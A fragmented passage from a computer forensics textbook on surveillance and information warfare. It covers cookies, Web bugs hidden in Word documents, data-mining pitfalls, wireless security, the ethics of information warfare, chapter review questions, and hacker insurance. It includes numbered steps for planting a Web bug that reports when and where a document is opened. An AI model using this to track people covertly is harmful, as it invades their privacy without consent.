Often, designers find themselves ill-equipped to
make this decision and so they employ cookies haphazardly or without regard for
user acceptance or data privacy
...

Instead, it explores technical considerations, interface design challenges, and (perhaps most importantly) ethical issues
...
The server asks the visitor’s browser program to “accept” the cookie—to save the ID number on the visitor’s computer
...

The ID number tells the server that the visitor has visited the site in the past
...
The ID number can save a visitor from having to repeatedly
log-in to a members-only site on each visit
...
Many users fear,
sometimes justifiably, that a cookie they accept may allow unscrupulous Web site
operators to gather information about them and then use that data in an unauthorized manner
...

Web site integrated platform designers should note this sometimes justified mistrust in cookies and design accordingly
...
Both Netscape and Microsoft
browsers can consult users before accepting a cookie, and many users choose to
browse with this preference turned on
...
Often, even
visitors who accept a cookie are still bombarded by offers of more cookies from the
same site
...
As feedback from users reaches

566

Computer Forensics, Second Edition

the designers of browser software, look for browsers to add the following features
to help users cope with this overuse of cookies:
Reject all cookies option
Better choices when asked
Cookie management tools
Reject All Cookies Option

Today, browsers present only the annoying false choice between “Accept all cookies without asking” and “Ask about each cookie
...

Better Choices When Asked

For users who choose notification, browsers should offer a more flexible set of
choices regarding what happens after a cookie has been accepted or rejected
...

About this particular cookie on this Web site integrated platform
About any cookie on this Web site integrated platform
About any cookie on this page
Cookie Management Tools

Finally, expect to see browsers offer a mechanism that lets users view and manage
the set of cookies they’ve collected
...
Until a majority of common browsers have incorporated
these options, integrated platform designers should plan to minimize the number
and type of cookies a visitor encounters on a site
...
A Web bug could allow an author to track where a document is being read and how often
...
Some possible uses of Web bugs in Word documents include
Detecting and tracking leaks of confidential documents from a company
Tracking possible copyright infringement of newsletters and reports

Surveillance Tools for Information Warfare of the Future

567

Monitoring the distribution of a press release
Tracking the quoting of text when it is copied from one Word document to a
new document
Web bugs are made possible by the ability in Microsoft Word of a document to
link to an image file that is located on a remote Web server
...
This image-linking feature puts a remote server in the position to monitor
when and where a document file is being opened
...
A host name will typically include a company name if a computer is located at a business
...

An additional issue, and one that could magnify the potential surveillance, is
that Web bugs in Word documents can also read and write browser cookies belonging to Internet Explorer
...

Web bugs are used extensively for tracking by Internet advertising companies
on Web pages and in HTML-based email messages
...

Although the Privacy Foundation has found no evidence that Web bugs are
being used in Word documents today, there is little to prevent their use
...
However, the Privacy Foundation has recommended to Microsoft that cookies be disabled in Microsoft Word
through a software patch
...

Detailed Description
Microsoft Word has, from the beginning, supported the ability to include picture
files in Word documents
...
doc file
...
All that is required to use this feature is to know the URL (Web address) of the image
...
Linking to the
image results in smaller Word document files because only a URL needs to be
stored in the file instead of the entire image
...
This is necessary to display the image on the screen or to print it out as part
of the document
...
Furthermore, it is possible to include an image in a Word document solely
for the purpose of tracking
...
Web bugs today are
already used extensively by Internet marketing companies on Web pages and embedded in HTML email messages
...

Because the author of the document has control of the URL of the document,
they can put whatever information they choose in this URL
...

These tracking abilities might be used in any number of ways
...

One example of this tracking ability is to monitor the path of a confidential
document, either within or beyond a company’s computer network
...
If the
company’s Web server ever received a “server hit” from an IP address for the bug
outside the organization, then it could learn immediately about the leak
...

All original copies of a confidential document could also be numbered so that
a company could track the source of a leak
...
If the document is leaked, the server
hit for the Web bug will indicate which copy was leaked
...
The utility program would scan a document for the Web bug URL and
add a serial number in the query string
...


Surveillance Tools for Information Warfare of the Future

569

Another use of Web bugs in Word documents is to detect copyright infringement
...
The Web bugs in a newsletter could contain unique customer ID numbers to detect how widely an individual newsletter is copied and distributed
...
For example,
a company could place Web bugs in a press release distributed as a Word document
...
The company could also observe
how a press release is passed along within an organization or to other organizations
...
A document could be bugged before it is distributed
...
If text were to be cut and pasted from the
document, it is likely that a Web bug would be picked up also and copied into the
new document
To place a Web bug in a Word document is relatively simple
...

2
...


Select the Insert | Picture | From File menu command
...

Select the Link to File option of the Insert button
...
Any file
format that supports automatic linking to Web pages or images could lead to the
same problem
...

This issue is potentially critical for music file formats such as MP3 files where
piracy concerns are high
...
The embedded HTML with embedded Web bugs could also be
used to track how many times a song is played and by which computer, identified
by its IP address
...
The number of data-mining consultants, as well as the number of commercial tools available to the “nonexpert” user,
are also quickly increasing
...
As more and more nonexperts seek to exploit this
technology to help with their business, it becomes increasingly important that they

570

Computer Forensics, Second Edition

understand the underlying assumptions and biases of these tools
...
In particular, there are important issues regarding the data that should be examined before
proceeding with the data-mining process
...

Now let’s focus on three specific issues
...
Also, insight is provided for each issue on how it might be problematic, and suggestions are made on which techniques can be used for approaching such situations
...
Particular concern is also established here
with characteristics of the data that may affect the overall usefulness of the IW
data-mining results
...
These lessons, together with the accompanying discussion, will help
to both guide the IW data-collection process and better understand what kinds of
results to expect
...
There are a number of
factors to consider before applying data mining to any particular database
...
Many of these issues are well known by both the data
mining experts and a growing body of nonexpert, data owners
...
There should not be a large number of missing or incomplete
records or fields
...

This section will discuss three specific, but less well-known, issues
...
The first is the impact of data distribution
...
Sometimes, however, obtaining samples of all classes is surprisingly difficult
...
High-quality data, combined with
good data-mining tools, does not ensure that the results can be applied to the desired goal
...
The current technology cannot fully
exploit arbitrary text, but there are certain ways text can be used
...
Indeed, for many IW data-mining experts, these are important issues that are often well understood
...
It is
tempting to collect a large amount of clean data, massage the representation into the
proper format, hand the data tape to the consultant, and expect answers to the most
pressing business questions
...

Two Examples
The discussion of data distribution, information relevance, and use of text will be
illustrated with examples from two current projects
...
In this project, one of the primary goals is to help
identify and characterize precursors to potentially dangerous situations in the aviation world
...
For any type of flight—commercial, cargo, military, or pleasure—accidents
(and often less serious incidents) are investigated
...
These reports often include the inspector’s written summary
...
A source of such reports is the National
Transportation Safety Board (NTSB)
...
In this particular instance, vehicles (mostly passenger vehicles and
small trucks) arrive at an inspection stop
...
There is typically a constant flow of cars to be processed, so excessive time cannot be taken
...
If the primary inspector feels it is
warranted (and there are any number of reasons that justify this), any vehicle can
be pulled out for secondary inspection
...
If the driver or vehicle is found to be in violation of the
particular laws under consideration, then information concerning both driver and
vehicle is collected and entered into the “violators” database
...

Data Distribution
Let’s first discuss the issue of data distribution
...
Consider the aviation safety
domain
...
An obvious source of information is the NTSB’s database of
accident reports
...
That is, the data are unevenly distributed between
records of accident flights and records of uneventful flights
...
When given the data containing only
accident flights, each of the approaches in this class concludes that all flights contain accidents
...
The majority of the flights are
uneventful
...
Furthermore, some of the most popular IW data-mining tools, including decision tree
inducers, neural networks, and nearest neighbor algorithms, fall into this class of
techniques
...
)
To continue this discussion, it is necessary to first define some terms used in
data mining
...
In the aviation domain, the target concept is accident flights
...

The NTSB data do not contain records of uneventful flights
...
The problem of learning to differentiate members from nonmembers is called a “supervised concept learning
problem
...

For example, a supervised concept learner uses a training sample as input
...
The supervised concept learner
produces hypotheses that discriminate the members and nonmembers in the sample
...

Let’s say that a supervised concept learner makes the closed-world assumption
that the absence of nonmembers in the data implies that they do not exist in the
universe
...
These learners partition the training sample into pure subsamples, containing either all member or all
nonmembers
...

That is, the learners introduce conditions that define partitions of the training sample; each outcome of a condition represents a different subsample
...
Unfortunately, if the input

Surveillance Tools for Information Warfare of the Future

573

sample contains only data that are members of the target class, the training sample
is already pure and the decision tree learner has no need to break up the sample further
...
Thus, in the aviation project, all flights
would be classified as accident flights, because the learner never saw any uneventful flights
...
For many problems, when representative data from all the concepts involved is available, these learners are both effective and efficient
...
) and the IW data-mining algorithms can be successfully run, there still may be
a problem of relevance
...
For instance, if the data mining produces typical “if
...
” rules,
then it must be possible to measure the values of the attributes in the condition
(“if” part) of those rules
...
Consider a simple example where the goal is to
predict if a dog is likely to bite
...
Assume further that the data-mining tools work splendidly, and it is discovered that the following (admittedly contrived) rules apply: Rule 1: If the rear
molars of the dog are worn, the dog is unlikely to bite
...

These may seem like excellent rules
...
There are two reasons for this: First, there is a time constraint in applying the
rules
...
Second, even without such a constraint, the average person probably can’t make judgments about
molar wear and muscle development
...

In the vehicle-targeting task described earlier, a similar situation occurred
...

As mentioned, much more information is collected concerning actual violators
than for those who are just passed through the checkpoint
...
The problem, noticed before any analysis was done, was that the information that would make up the profiles would not be applicable to the desired task
...
During
that time, they have access to only superficial information
...
Thus, they have no way to apply classification rules
that measure features such as “number of other cars owned,” “bad credit history,”
or “known to associate with felons” (types of data collected on violation vehicles
and drivers)
...
The problem is that the data cannot be applied to the initially
specified task
...
Often, IW data mining begins with data that has been
previously collected, usually for some other purpose
...
As the examples show, this is often not the
case
...
No one ever
intended to use this information as a screening tool at stop points
...
Does it address the current situation directly? Similarly, when data is collected for the specific
task at hand, careful thought must go into collecting the relevant data
...
The
most obvious is to use additional data from another source
...
For instance, returning to
the example of the dogs, general aggressiveness characteristics for different breeds
of dogs have been determined
...
When the necessary data does not already
exist, it may be necessary to collect it
...
In this case, data must be collected that relates
directly to the information available to the inspectors at the initial inspection
...
Of course, collecting new data may be a very expensive process
...
This often involves discussions and interviews with
experts in the field
...
It
may be that an inordinate amount of manpower is required, or that certain features
are difficult to measure
...
It may be possible to alter the initial goals or questions
...
A good example
would be looking at simple statistical patterns for time of day, weather, season, and
holidays
...
Another alternative is to use the violator database to profile suspects for other situations
...
Perhaps this information can be
used elsewhere in law enforcement
...
However, it may not be possible to achieve that goal with this data and the
given time constraints
...

Combining Text and Structured Data
IW data mining is most often performed on data that is highly structured
...
An example of structured data is a database containing records describing aircraft accidents that includes fields such as the make of an airplane and
the number of hours flown by the pilot
...
Although more difficult to immediately use
than structured data, data mining should make use of these available text resources
...
These techniques require structured fields with clearly
defined sets of possible values that can be quickly counted and matched
...
Text is not so well behaved
...
These are difficult issues
that are not yet totally solved, but useful progress has been made and techniques
have been developed so that text can be considered a resource for data mining
...
Information retrieval is concerned with methods for efficiently retrieving documents relevant to a given request or query
...
More specifically, this
method first identifies all the unique words in the document collection
...
Using the simplest weighting method, this vector has

576

Computer Forensics, Second Edition

a value of 1 at position x when the xth vocabulary word is present in the document; otherwise it has a value of 0
...
Now each document vector
can be compared to every other document by comparing their word vectors
...
Surprisingly, although this approach discards the structure
in the text and ignores the problems of polysemy and synonymy altogether, it has
been found to be a simple, fast baseline for identifying relevant documents
...
The
narrative description of each accident was represented as a vector and compared to
all other narratives using the approach described earlier
...
” The following accident reports were found to be similar in this
respect:
MIA01LA055: During takeoff roll he or she applied normal right rudder to
compensate for engine torque
...

ANC00LA099: Veered to the left during the first attempt to take off
...

Identifying this kind of a group would be difficult using fixed fields alone
...
This can be a useful tool for
identifying patterns in the flight history of the accident so that the events leading up
to different accidents can be more clearly identified
...
A collection of documents and a taxonomy of terms are combined so that maximal word
or category associations can be calculated
...

Another approach relevant to IW data mining from text is information extraction (IE)
...
The
biggest problem with IE systems is that they are time-consuming to build and domain specific
...
IE tools could be used in the airline safety data to pull out information
that is often more complete in the text than in the fixed fields
...

An example of just such an overlap can be found in the NTSB accident and incident records
...
However, it was found that these fields are
rarely filled out completely enough to make a classification: 95% of the records that
were identified as involving people could only be classified as “unknown
...
Such an
approach could make use of a dictionary of synonyms for “mistake” and a parser
for confirming if the mistake was an action made by the pilot or copilot and not in
a sentence describing, for example, the maintenance methods
...
Although automatic systems that completely understand the text are a still a long way off, one of
the surprising recent results is that simple techniques, which sometimes completely
ignore or only partially address the problems of polysemy, synonymy, and complex
structure of text, still provide a useful first cut for mining information from text
...


THE INTERNET IS BIG BROTHER
How prepared is your business for the future? As the Internet expands its reach to
the farthest corners of the globe, companies will find themselves dealing with increasingly complex challenges such as Big Brother
...
First, the
experience will not be anything like what we’re familiar with
...
Third, the business environment of the future
will be much less forgiving, so companies that do not take the new technologies seriously are putting themselves at risk
...
Recently, better installation techniques and a wider range of fiber-compatible equipment have made fiber both
easily available and less expensive than it used to be
...
After all, few businesses want to bear even slightly higher
costs for fiber installation and networking gear
...
Expect them to get away with it,
too, because for most practical purposes, copper can handle the load
...
The biggest problem the providers face seems to be
keeping up with demand
...
Even then, North America will be home to
wide swaths of rural territory without high-speed access
...
Unless governments (Big Brother) insist that Internet carriers supply rural service at a loss (as
American telephone companies were ordered to do with voice service), broadband
providers will have little incentive to deploy their technologies on a wide scale
...
In its infant state, broadband wireless, with its ability to support certain
e-business applications, is best suited to a LAN-like role
...

A Truly Global Internet
The days of Americans (Big Brother) ruling the Internet are not over by a long shot
...
As the Internet becomes more pervasive, businesses will face an
even greater shortage of skilled employees
...

As always, the spoils will go to those businesses that think ahead
...
That means considering technical
issues and different standards of civil rights, conduct, and privacy
...


Surveillance Tools for Information Warfare of the Future

579

THE WIRELESS INTERNET: FRIEND OR FOE?
The wireless networking engineer was working her way through the IW test range
when she stopped and looked at her computer screen
...
She was testing the roaming capabilities of 802
...

This isn’t surprising, because one of the nice things about wireless Internet is
the ability to install the products quickly and easily, with a minimum amount of
configuration
...

If Internetwork managers don’t pay attention to the fact that the default condition of wireless access points is to let anyone into the network, then they may be
doing just that
...
It’s like installing a network port on the lamppost
outside your building and asking anyone who walks by to plug in
...
It just requires network administrators to take a few simple steps
...
Having that ID makes logging-in even easier than it already
is
...
All 802
...
Third,
turn on your ability to use access control lists, available in some access points
...

These steps will keep most wireless networks reasonably secure
...

You must also deal with the fact that wireless access points are inexpensive and
that getting them running is a no-brainer
...
You’d then have an entry point into your network that’s
open to anyone with a wireless Internet card
...


580

Computer Forensics, Second Edition

Another problem is that, without limits on what users are allowed to do and
where they’re allowed to go, you lose control
...
One
solution is to move to a third-party provider of wireless security products, such as
WRQ, whose NetMotion product requires a login that’s authenticated through
Windows NT
...

Such capabilities require a bit more attention from managers, but the result can be
a wireless Internet that’s more secure than the wired one it’s attached to
...

Meanwhile, these employees opened their companies’ networks to anyone (friend,
foe, hacker, or spy) who cared to enter
...
That eliminates the need for employees to buy their
own access points, and it gives the IT department the tools it needs to detect and
eliminate them
...
The means
are relatively inexpensive, easy to smuggle, virtually untraceable, and completely
deniable
...

Currently, the security solutions lag far behind the potential threat
...
The basic concepts and principles that must be understood
and can help realistically guide the process of moving forward in dealing with the
surveillance tools for the IW of the future are as follows
...
S
...
With this emphasis, they must carefully assess the vulnerabilities of the systems they employ
...
This needs to be accomplished through a more balanced investment strategy by the U
...
military that conquers our institutional prejudices
that favor killer systems weapons
...
S
...

The electromagnetic spectrum will be their Achilles’ heel if the U
...
military
does not pay sufficient attention to protecting their use of the spectrum and, at
the same time, recognize that they must take away the enemy’s ability to see the
U
...
forces and to control their own forces
...
S
...

Other nations have realized the value of offensive applications of the IW arsenal of the future; therefore, the U
...
military must attack the issue from two directions, offensively and defensively, with almost equal accentuation
...
When the Soviets developed a nuclear program after World War
II, the United States was caught by surprise
...
S
...

As with so many other design issues, taking the user’s experience into account
suggests how to proceed with implementing cookies
...

Although automated understanding of natural language is not available, an increasing number of techniques can be used for exploiting text data
...


An Agenda for Action
It must be pointed out that although such IW preparation measures can provide a
minimum level of protection against tampering, there is no such thing as 100% security
...
At present the cost of protection is higher than the cost
of attack, and until an attack on a major system actually happens, organizations are
unlikely to take security measures as seriously as they could or should
...
S
...
Action steps should include, but not be limited to the 11 areas shown in Table
F18
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


582

Computer Forensics, Second Edition

CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
S
...

With this emphasis, they must carefully assess the vulnerabilities of the systems
they employ
...
True or False? Interdict opportunities exist for adversaries to intrude on U
...

military systems
...
True or False? Offensive systems will be at risk if the U
...
military does not
apply sufficient defensive considerations in this process
...
True or False? The IW arsenal of the future adds a fourth dimension of warfare
to those of air, land, and sea
...
In this new
dimension, the U
...
military must stay ahead
...
True or False? An important feature of bandwidth/packet management technology is its stealthy wireless Internet security features that render complete
invisibility and protection for end users from network hackers and other wireless users sharing the same access points
...
As feedback from users reaches the designers of browser software, look for
browsers to add the following features to help users cope with this overuse of
cookies, except:
A
...
Better choices when asked
C
...
Cookie management tools
2
...
,” except:
A
...
About all cookies
C
...
About any cookie on this page

Surveillance Tools for Information Warfare of the Future

583

3
...
Managing documents
B
...
Tracking possible copyright infringement of newsletters and reports
D
...
Tracking the quoting of text when it is copied from one Word document
to a new document
4
...
The full URL of the Web bug image
B
...
A Web browser cookie (optional)
D
...
To place a Web bug in a Word document is relatively simple
...
Select the Delete | Picture | From File
...

B
...
menu command
...
Type in the URL of the Web bug in the File Name field of the Insert Picture
dialog box
...
Select the Link to File option of the Insert button
...
He deduced that his trusted staff of system administrators might have been misusing
their access privileges and the network servers for some unknown purpose
...
How was
the CFST able to go about conducting their investigation?

HANDS-ON PROJECTS
A large multinational corporation was accused of questionable financial reporting
by the SEC, resulting in an investigation by a major independent consulting company
...
How did the CFS go about conducting the investigation?
Case Project
A CFST conducted the analysis of multiple seized computer systems taken in connection with major cases of central excise duty evasion in the Indian government
...
Austin is the state capitol, and the government offices employ approximately 20% of the population
...
The APD also had a system administrator who was located out of state, and they weren’t sure he was trustworthy
...
How did the CFS go about conducting the investigation?

REFERENCES
[1] Vacca, John R
...

[2] Vacca, John R
...

[3] Vacca, John R
...

[4] Vacca, John R
...

[5] Vacca, John R
...

[6] Vacca, John R
...

[7] Vacca, John R
...
, Prentice Hall, New York,
2001
...
National information systems are, among other things, already used to conduct commerce and regulate and control national production
...
Accordingly, this infrastructure may now be considered to
represent an extension of national sovereignty, and any attacks on national information systems may be perceived as attacks on the nation itself
...

A further argument may be that the national security implications of information attacks make the defense against such attacks a military task
...
Most are presently not capable of operating in a hostile information environment
...
Again, most police forces are
incapable of defending against such attacks
...
Regardless of the capabilities of the various organizations, the
jurisdiction boundaries that separate civilian and military security responsibilities
are blurring as the Information Age evolves
...
Significant elements of
many of the information systems used by the world’s modern military forces are

N

585

586

Computer Forensics, Second Edition

designed, developed, and managed by civilians, primarily for civilian purposes, and
make extensive use of the civilian information infrastructure
...
The use of unique systems by military forces
for all of their information tasks is not economically viable
...
Likewise, an attack that is directed at a civilian user of an information system may inadvertently affect military users
...

Identifying the source of an information attack can be difficult, at times impossible, and can contribute to the problem of determining an appropriate response
...
Determining whether a nation, an individual, or a non-nation-state organization committed the IW attack may also be impossible, as may be ascertaining the
extent of any damage caused to civilians or refugees
...
Therefore, although distinguishing between a military information operation (MIO) and a civilian information operation (CIO) is highly desirable, and, from a legal viewpoint may be
essential, such distinction is often impossible
...
Securing a national information infrastructure presents unique challenges to national security
agencies and demands unique and innovative solutions
...
There is a strong argument for the development of a national information authority responsible for assuring the integrity of all national information systems, advising on the development of new information systems,
sponsoring research and development into information-assurance technologies,
and ultimately prosecuting information operations in support of diplomatic,
counter-criminal, and conflict-resolution objectives
...

Such an organization would not deny the individual elements of a nation’s armed
forces the right to develop their own information strategies; indeed, all the armed services have both a single-service and joint responsibility to develop robust information
strategies now
...
It is an option that should be considered by any government with a
genuine commitment to national security and the protection of its civilians
...

IW is defined as an attack on information systems for military advantage using
tactics of destruction, denial, exploitation, or deception
...
Current research is searching for robust solutions at each step in the information cycle, but the problem is systemic in that for every new solution, a new
threat is developed
...
The
most important enabling feature of the diffusion of information technology is declining cost
...

The IW threat will continue to grow at the expense of the cyber masses because
entry costs are low and decreasing, leading a large number of foreign governments
to organize strategic IW organizations within their military
...

Information systems are so critical to military operations that it is often more
effective to attack an opponent’s information systems than to concentrate on destroying its military forces directly
...
This has lead to a reevaluation of military doctrine referred to as a
revolution in military affairs (RMA)
...

The United States is potentially vulnerable to IW attack because it is more dependent on information systems than any other country in the world
...
In a civilian context,
the quality of life of our most basic needs is dependent on automated informationmanagement systems
...
S
...
In January 1997, the Defense Science Board within the
Pentagon released a task force report warning of U
...
vulnerability to an “electronic Pearl Harbor,” which puts the cyber masses at great risk with a lot to lose
...
The Pentagon already spends $8 billion a year to protect its information military systems
...
Eight critical national infrastructures were considered so vital that their incapacity or destruction
would have a debilitating effect on the defense and economic security of the United
States
...

2
...

4
...

6
...

8
...
In California’s Silicon Valley, large
Internet data centers have been blamed for stressing the region’s power grid beyond
what its Korean War–era design can handle
...

From a cybersecurity perspective, the electric power grids in the West are now
more fragile, and margins for error are significantly less
...

The recent power shortages come as the Critical Infrastructure Assurance Office
(CIAO) of the U
...
Department of Commerce delivered to Congress the first status
report on private-sector efforts to bolster cyberdefenses for systems that run critical

Civilian Casualties: The Victims and Refugees of Information Warfare

589

sectors of the economy
...

In the context of broader infrastructure assurance, the scale and complexities of
the energy infrastructure and their impact on infrastructure security and reliability
are not fully understood
...

Likewise, the sector continues to fall victim to poor personnel security practices,
ports, and services that are open to the Internet; outdated software without current
security patches; and improperly configured systems
...

For instance, if someone were to find a way to force the shutdown of a single power
plant or a section of the power grid, the results would be much more devastating,
because there is not enough reserve capacity to take up the slack
...
One risk with a situation
like this is that it exposes the flaws of the system to public scrutiny
...
Like it or
not, there are people in the world who pay attention to such revelations
...
It is recommended that companies, particularly utility companies, treat the power crisis as
a signal to begin stepping up network monitoring and security operations
...
Hackers smell weakness and a chance for their 15 minutes of fame
...
When a transmission system is stressed, the system operators and
security coordinators operate at a heightened level of alert so they can quickly
address and return the transmission system to normal from any situation that may
occur
...
This was the case decades ago, and
it is still true today
...
S
...
During the Cold War, the United States used a policy of strategic nuclear
deterrence, warning that any nation that attacked the United States could expect
total destruction in return
...
By analogy, analysts have wondered if a
similar strategy might deter IW attacks on the U
...
national information infrastructure (NII)
...

The identity of the perpetrator must be unambiguous
...

The perpetrator must have something of value at stake
...

This strategy of deterrence must be measured in the context of the inherent
vulnerability of large technologically based systems
...

The failure of a complex system may be exceptionally difficult to discover and
repair
...

It must be possible to determine if an event involving one of the United States’
vital infrastructures is the result of an accident, criminal attack, isolated terrorist incident, or an act of war
...
S
...
Possible jurisdictions
include private industry, the FBI/Department of Justice, CIA/National Security
Agency (NSA), or DoD; possible responses range from doing nothing to a nuclear
retaliatory strike
...
Many of the questions have been raised before in previous contexts, but the
unique characteristics of IW bring urgency to the search for new relevant answers
...
For example, in an IW

Civilian Casualties: The Victims and Refugees of Information Warfare

591

analogy to the U
...
blockade of Cuba during the Cuban missile crisis, there are IW
techniques (jamming and denial-of-service attacks) that could be used to block
and, thus, isolate rogue nations from international communications without circumventing physical sovereignty—much in the same way the British decided to
sever all transatlantic telegraph cables that linked Germany to international communications at the outset of World War I
...
A state under international law
possesses sovereignty, which means that the state is the final arbiter of order within
its physical geographical borders
...
Internally, a state uses dominant force to
compel obedience to laws, and externally, a state interacts with other states, interaction in either friendly cooperation, competition, or to deter and defeat threats
...
This national information policy must also
include options that consider individuals or other non-state actors who might try
to provoke international conflicts
...
With IW, the state does not have a monopoly on
dominant force, nor can even the most powerful state reliably deter and defeat IW
attacks
...
With the advent of the Information
Age, the United States has lost the sanctuary that it has enjoyed for over 200 years
...
S
...

War is armed conflict between nation-states
...
The modern view of war provides a new look at
the tradition of a just war, jus ad bellum, (when it is right to resort to armed force)
and jus in bello, (what is right to do when using force)
...

2
...

4
...

6
...

It must be authorized by a competent authority
...

It must have a reasonable chance of success
...

The expected outcome must be peace
...
The application of just war reasoning to future IW conflicts is problematic, but there is a
growing voice saying there is a place for the use of force under national authority
in response to broader national security threats to the values and structures that define the international order
...
It is impossible to respond to every IW action, because there are too many
...
However, nothing in the charter impairs the inherent right of individual or collective self-defense if an armed attack occurs
...
Experts do not equate “use of force” with an “armed attack
...

On the other hand, Article 41 of the United Nations specifically states measures
that are not considered to be an armed attack: complete or partial interruption of
economic relations and of rail, sea, air, postal, telegraphic, radio, and other means
of communications
...

If data manipulation is such that the primary effects are indistinguishable from
conventional kinetic weapons, then IW may be considered an armed attack
...

What are the ethical implications of the blurring distinction between acts of
war from acts of espionage from acts of terrorism? Let’s take a look
...
An armed attack as stated in Article 51 contemplates
a traditional military attack using conventional weapons and does not include propaganda, information gathering, or economic sanctions
...


Civilian Casualties: The Victims and Refugees of Information Warfare

593

The threat analysis section of the 1997 Defense Science Board Report indicates
that a significant threat includes activities engaged on behalf of competitor states
...
In the age of multinational corporations that view
geographical boundaries and political nation-states as historical inconveniences,
should economic warfare between multinational corporations involve the military?
The new IW technologies make it difficult to distinguish between espionage
and war
...
During
peacetime, gaining entry to a computer’s internal operating system could be considered a criminal offense or act of espionage, despite the fact that the action in
question took place before the enemy had acquired ownership of the computer
...
Nonlethal most often refers to
immediate casualty counts, not downstream collateral effects
...
S
...
This weaponry includes sticky foam cannons, sonic cannons, and electromagnetic weapons— which effectively temporarily paralyze the enemy without
killing them
...
For instance, disabling the electronics of a fighter plane or air defense
radar during wartime is the goal of a large investment in electronic warfare equipment
by the United States and is considered fair and ethical
...

Is It Ethical to Set Expectations for a “Bloodless War” Based on IW?

As nonlethal weaponry of all types (especially IW weapons) advance from novelty
to norm many potential pitfalls will need to be faced
...

Nonlethal military capabilities are not new, although IW weapons are the newest
weapons in the nonlethal arsenal
...
As U
...
military forces are involved in missions that require extended direct contact with civilians (Somalia, Bosnia), force can no longer be viewed as either on or off, but rather
as a continuum with nonlethal weapons on one end and nuclear devices on the
other end
...
If IW weapons can be used
to remotely blind an opponent to incoming aircraft, disrupt logistics support, and
destroy or exploit an adversary’s communications, then many of the problems associated with the use of ground forces for these missions can be avoided
...
Because these technologies are potentially lethal in these circumstances, the term nonlethal has not been universally accepted within the U
...

military
...
S
...

Asserting that IW will ultimately allow future wars to be fought without casualties is a widespread misconception likely to prove counterproductive and even potentially dangerous to the cyber masses
...
Second, overselling of nonlethal capabilities without providing a context can lead to operational failures, deaths, and policy failure
...

There is a large asymmetry in global military power when comparing the
United States to other nation-states
...
S
...
This asymmetry makes
it unlikely another nation-state would challenge the United States in a direct hightechnology conventional war, except in circumstances that cyber masses should not
depend on (incredible miscalculations or ignorant dictators, which were both present in the Gulf War
...
S
...
These expectations go against two cardinal rules of military strategy: (1) you do not plan to
refight the previous war and (2) the future battlefields cannot be dictated by the
United States
...
S
...
Even in this scenario, military and civilian casualties will be likely from either primary or secondary
effects of IW attacks
...
S
...
S
...
The questions remain: is it ethically correct for
the United States to defend its security interests by resorting to the same IW tactics
that are used against it? Should information attacks be punished by information
counterattacks? The options include maintaining the United States’ superpower
status at all costs, covertly listening to their adversaries but not actively disrupting
operations, or contracting mercenaries, who are not officially affiliated with the
U
...
government, to do their dirty work
...
It is also harder to
predict secondary effects because of the globalization of systems
...
S
...
A nation-state or non-state actor that sponsors an attack

596

Computer Forensics, Second Edition

on the U
...
NII might lack an NII of their own for the United States to attack in
punishment and, thus, not be intimidated by a U
...
IW deterrence strategy
...
Every breach of
international law creates a duty to pay for loss or damages; nation-states may seek
recompense under “state responsibility doctrine
...
IW may violate
multiple international laws depending on the scenario, including the following:
UN Convention on Law of the Sea (prohibits unauthorized broadcasts from
the high seas)
International Telecommunications Convention of 1982 (requires nations to
avoid “harmful interference”)
INTELSAT Convention (satellite communications for nonmilitary purposes) [1]
INMARSAT (maritime satellite communications for “only peaceful purposes”)
Chicago Convention (refrain from endangering safety of flight)
According to DoD Policy Directive 5100
...
S
...
” The
problem is that there are no characterized rules of engagement for IW conflicts, which
can take the form of isolated operations, acts of retribution, or undeclared wars
...
Every breakthrough in offensive
technology eventually inspires a matching advance in defensive technology, thus escalating an IW weapons race
...
Given the uncertainty of deterrence and identifying the enemy, is the most ethical strategy for retaliation one that
attempts to separate the military from civilians and, in so doing, diminishes their
impact, which potentially prolongs the duration of the conflict, or a strategy that attempts to minimize lethality and duration but deliberately targets civilian systems?
Can Protection from IW Take Place in the
United States Given Our Democratic Rights?

How much government control of the U
...
NII is permissible in a free society? Most
of the IW technology is software, which is easy to replicate, hard to restrict, and dualuse by nature (having civilian and military uses)
...
This raises basic questions about the constitutional
and ethical balance between privacy [2] and national security in a new IW context
...
Most systems were
built to serve commercial users who will vehemently object to unfunded mandates
(taxes) and new requirements not driven by business demand (CLIPPER chip encryption and key escrow accounts)
...
If an IW attack
is detected and the enemy identified, but the United States is unable to react
promptly because of bureaucratic inefficiency or indifference from private industry, it may be too late to react at all
...
In a related matter that may provide a precedent,
the government has pledged to provide telephone companies with at least $1
...


THE DESTRUCTION OF PERSONAL ASSETS IN IWS
The Mounties always get their man—or, when it comes to hackers, their boy
...
His father was also nabbed, on unrelated charges of plotting to assault a business associate
...
He
was not what one would call a genius
...
While awaiting
trial, he could not enter any public space that hosts networked computers
...
com incident was part of a rash of denial-of-service attacks that crippled
Yahoo!, eBay, and other Internet titans, leading to a manhunt that stretched throughout the United States, Canada, and Germany
...
3 billion
...
If you’re a law enforcement organization,
it makes the crime look more serious
...
If you’re the press, it makes
the story more sensational
...
AIG, the largest commercial insurance underwriter in the United States, hopes the free on-site security check—which ordinarily
can cost tens of thousands of dollars—will encourage more companies to buy insurance coverage from it
...
9 billion in annual premiums by 2009
...
Insurance
industry officials indicate their business is doubling every 7 to 13 months, as worries
about hacking increase and more information technology professionals realize their
companies’ standard insurance policies don’t cover risks incurred by their Internetbased businesses
...
The cost of the insurance
application in the past included (for almost everyone) an on-site security assessment
that would cost upward of $60,000, regardless of whether you bought the insurance
...
The firms do external probes and
“ethical hacking” of a prospect’s Web site, as well as a three-day, on-site analysis to
determine what types of security problems the company faces
...
Although AIG’s
assessment is free, some competitors expressed skepticism
...
Security is not a product; it’s a process
...
Some policies only pay for risks associated with loss or misuse of intellectual
property
...

Premiums are generally based on a company’s revenue, as well as the type and
amount of coverage being sought
...
A package policy that covers a range of
risks, including liability, loss of revenue, errors and omissions, and virus protection,

Civilian Casualties: The Victims and Refugees of Information Warfare

599

can cost from $10,000 to $54,000 per year (or more) for each million dollars of coverage in the policy
...
Some policies cover only the amount of net income lost due to hacking
...

Numerous variables can affect premiums
...
For instance, a policy that begins
paying for business losses just four hours after a hacker shuts down a site may cost
more than a policy that begins paying after 24 hours of downtime
...

Companies can also get substantial discounts on their policies if they have managed service contracts with an insurer-certified security firm
...
Hacker insurance is
such a new product that there are no reliable actuarial tables to determine rates
...
For the companies seeking insurance, assessments should help them find (and immediately fix)
holes in their defense systems
...
Paul Companies, Lloyd’s of London, and Wurzler) are rolling out a fleet
